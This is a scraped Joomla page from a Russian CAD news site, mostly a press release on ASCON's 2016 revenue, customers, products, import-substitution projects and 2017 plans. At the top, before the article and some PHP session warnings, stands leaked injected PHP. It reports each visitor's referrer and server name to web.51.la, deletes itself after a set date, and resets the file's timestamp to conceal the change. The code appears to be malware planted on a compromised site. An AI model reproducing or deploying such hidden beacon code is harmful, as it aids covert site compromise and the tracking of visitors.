check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/u70256/gemma-stru/www/includes/framework.php:101) in /home/u70256/gemma-stru/www/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/u70256/gemma-stru/www/includes/framework.php:101) in /home/u70256/gemma-stru/www/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/u70256/gemma-stru/www/includes/framework.php:101) in /home/u70256/gemma-stru/www/libraries/joomla/session/session.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /home/u70256/gemma-stru/www/includes/framework.php:101) in /home/u70256/gemma-stru/www/templates/ja_purity/ja_templatetools.php on line 44
АСКОН в 2016 году: 1,1 миллиарда рублей и 11% роста
 

ГеММа-3D

СОВЕРШЕНСТВО ТЕХНОЛОГИЙ РОССИИ

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта

АСКОН в 2016 году: 1,1 миллиарда рублей и 11% роста

E-mail Печать PDF

АСКОН работает на рынке САПР уже 28 лет. Со стороны может показаться, что подводить итоги каждый год на протяжении столь долгого периода занятие не самое захватывающее: выручка измеряется миллионами, заказчики — тысячами, даже сами продукты и их версии — десятками. Но для нас каждая новая цифра и каждый новый факт — это история заказчиков и пользователей, это результат работы большой команды программистов, маркетологов, специалистов по внедрению, сбыту и техподдержке. И мы с удовольствием делимся этими результатами!

2016: главные факты

В 2016 году АСКОН обновил свой исторический рекорд по выручке. Бизнес компании вырос на 11% по сравнению с 2015 годом — выручка составила 1,1 млрд рублей. При этом число заказчиков тоже переступило знаковый порог в 10 000 (подумать только, еще 5 лет назад ПО АСКОН использовали чуть более 6000 предприятий и организаций!).

Каждое бизнес-направление АСКОН перевыполнило план и внесло свой вклад в общую динамику:

  • АСКОН-Системы проектирования — разработка CAD-систем и решений для управления проектными работами в строительстве,
  • АСКОН-Бизнес-решения — разработка продуктов для управления жизненным циклом изделия,
  • АСКОН-Интеграция — поставка инженерного программного обеспечения и реализация комплексных проектов автоматизации.

Особенно заметными кирпичиками в фундаменте роста стали оборонная и атомная отрасль, где традиционно используется вся машиностроительная линейка АСКОН. Однако и в строительной сфере были свои тяжеловесы: так, в рейтинг крупнейших контрактов по итогам года вошел проект по замещению зарубежной САПР на КОМПАС в одном из проектных институтов.

2016: крупные ИТ-проекты

В течение года портфель проектов АСКОН пополнялся десятками новых интересных кейсов разного масштаба, содержания и отраслевой принадлежности. Многие из них в силу специфики деятельности предприятий станут публичными лишь спустя какое-то время. Но некоторыми мы гордимся уже сейчас:

  • Атом. Внедрение типовой информационной системы ядерного оружейного комплекса во ФГУП «Комбинат «Электрохимприбор» (Росатом), АСКОН-Урал

  • Оборонно-промышленный комплекс. Автоматизация конструкторско-технологической подготовки производства в АО «Завод имени АА. Кулакова» (Концерн Гранит-Электрон), АСКОН-Северо-Запад

  • Приборостроение. Внедрение автоматизированной системы конструкторско-технологической подготовки производства в АО «Серпуховский завод «Металлист» (Ростех), АСКОН-Центральная Россия

  • Сервис и инжиниринг. Создание автоматизированной системы хранения технической документации на базе ЛОЦМАН: Эксплуатация в АО «Центрэнергогаз» (Газпром), АСКОН-Центральная Россия

2016: итоги в продуктовом разрезе

О растущем доверии к отечественному PLM говорят, конечно, не лозунги и заголовки в СМИ, а реальные цифры: в 2016 году мы наблюдаем 30-процентный рост рабочих мест САПР ТП ВЕРТИКАЛЬ и системы управления жизненным циклом изделия ЛОЦМАН:PLM. Причем это именно новые лицензии и рабочие места, а значит, новые заказчики и новые проекты автоматизации.

Но к порядку в управлении инженерными данными стремятся не только на крупном производстве. Небольшим конструкторским бюро пока велики «тяжелые» PLM-инструменты, зато им впору PDM-система ЛОЦМАН:КБ — к концу года у продукта уже более 80 заказчиков.

В 2017 году и крупные, и малые предприятия смогут пополнить арсенал ИТ-средств новинкой «8D. Управление несоответствиями» для решения задач в области управления качеством, которую АСКОН выпустил в январе. Продукт будет интересен любой производственной компании, заинтересованной в повышении прозрачности внутренних процессов и сокращении издержек.

Пока полным ходом шла разработка КОМПАС-3D v17, актуальная версия системы не оставалась в тени. По итогам 2016 года — плюс 4500 новых рабочих мест КОМПАС! При этом большинство укомплектованы специализированными приложениями. Особой популярностью у предприятий пользуются Оборудование: Трубопроводы, Оборудование: Металлоконструкции, Механика: Пружины, Валы и механические передачи 3D — эти приложения завершили год с 20-30-процентным ростом.

Однозначным САПР-трендом стал переход с КОМПАС-График на КОМПАС-3D. В 2016 году трехмерное проектирование выбрали в 2,5 раза больше пользователей, чем годом ранее. Что ж, прогресс неминуем! Но и сам по себе КОМПАС-График не сдает позиций, замещая зарубежные 2D-пакеты для строительного проектирования и выпуска конструкторской документации.

Корпоративной редакции системы для управления проектной организацией Pilot-ICE Enterprise 2016 год принес 40 новых клиентов. Среди них, например, инжиниринговая компания «Научно-исследовательский и проектный институт карбамида». В НИИК будет развернуто самое масштабное на данный момент внедрение системы: 500 рабочих мест на четырех территориально удаленных площадках. В течение года новости поступали не только от заказчиков решений для ПГС-индустрии, но и от разработчиков: было выпущено 11 релизов Pilot-ICE и 7 релизов ЛОЦМАН:ПГС, появились Pilot-Server для ОС Linux, web-клиент и модуль планирования RPM для Pilot-ICE.

Команда геометрического ядра C3D тоже представила два новых продукта: модуль визуализации геометрических данных C3D Vision и модуль твердотельного геометрического моделирования C3D Modeler для платформы Teigha, которую развивает Альянс по открытому проектированию (Open Design Alliance). Теперь ядро C3D – это целый набор инструментов C3D Toolkit для создания систем проектирования (CAD), расчетных систем (CAE), систем подготовки управляющих программ для станков с ЧПУ (CAM) и другого инженерного ПО. В 2017 году выручка подразделения C3D Labs от внешних заказчиков выросла на 50%, к их числу присоединились российский разработчик САПР «Нанософт» и РФЯЦ-ВНИИТФ Госкорпорации «Росатом».

2016: импортозамещение

Идея импортозамещения в последнее время воспринималась скептически и пользователями, и разработчиками — пришло понимание, что взять и заменить импортное на российское «по отмашке» невозможно. Зато показал свою состоятельность более прагматичный подход: отечественное ПО выбирают, исходя из пользы для бизнеса, ведь это выгодно и надежно. В 2016 году число рабочих мест, где системы КОМПАС-3D и КОМПАС-График пришли на смену иностранным САПР, выросло по сравнению с 2015 годом в три раза. При этом реальное импортозамещение коснулось совершенно разных отраслей и производств. О замене зарубежного CAD на КОМПАС заявили «Гражданские самолеты Сухого». Златоустовский машиностроительный завод (Роскосмос) приступил к переходу на Комплекс АСКОН для проектирования и управления инженерными данными. РФЯЦ-ВНИИТФ Госкорпорации «Росатом» тоже отказался от зарубежных компонентов для разработки собственного ПО в пользу геометрического ядра C3D. На ФНПЦ «Титан-Баррикады» в 2016 году прошло внедрение комплексного решения АСКОН для сквозного проектирования — предприятие назвало проект «примером эффективного импортозамещения».

2016: важные события

Базовые продукты АСКОН — КОМПАС-3D и КОМПАС-График, ВЕРТИКАЛЬ, ЛОЦМАН:PLM, Справочник технолога и Справочник Стандартные Изделия, Pilot-ICE Enterprise и ЛОЦМАН:ПГС – в течение года вошли в единый реестр российского ПО, созданный Минкомсвязи РФ в целях расширения использования отечественного ПО.

А в сентябре АСКОН и фирма «1С» объявили о создании совместного предприятия Renga Software по разработке продуктов в соответствии с технологией информационного моделирования объектов строительства. В рамках этого партнерства теперь будет продолжаться развитие архитектурно-строительной системы Renga Architecture, системы для проектирования строительных конструкций Renga Sructure и перспективных BIM-инструментов.

2017: планы и перспективы

Уже совсем скоро, в апреле, состоится долгожданный выход КОМПАС-3D v17. В поддержку премьеры по городам России и СНГ пройдет промотур «КОМПАС-3D v17. Зарядись обновлением!».

Важной новинкой 2017 года станет приложение КОМПАС-Эксперт, предназначенное для автоматической проверки чертежей и 3D-моделей. Одно приложение обеспечит пользователям собственный автоматический нормоконтроль на соответствие стандартам ЕСКД или стандартам предприятия.

Во втором квартале в свет выйдет ЛОЦМАН:PLM 2017, а осенью обновится весь Комплекс АСКОН — будет выпущена ВЕРТИКАЛЬ 2017, состоится премьера MDM-системы для управления нормативно-справочной информацией, которая объединит все Справочники АСКОН в одной среде.

Продуктовая линейка решений для промышленного и гражданского строительства пополнится системой управления корпоративным контентом Pilot-ECM. Вместе с с Pilot-ICE она составит комплексное решение для управления проектной деятельностью. В течение года пользователи также будут получать новый функционал Pilot-ICE и ЛОЦМАН:ПГС через выпуск регулярных релизов.

Увидеть все существующие и перспективные разработки АСКОН, а также решения, созданные совместно с другими отечественными вендорами — участниками консорциума «РазвИТие», можно будет осенью на третьем форуме «РазвИТие. Российские технологии для инженеров».

До встречи и следите за новостями АСКОН!


Источник.
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск

Реклама


Случайная новость

На сайте НТЦ ГеММа доступна для скачивания ГеММа-3D версия v10.0 (сборка 015).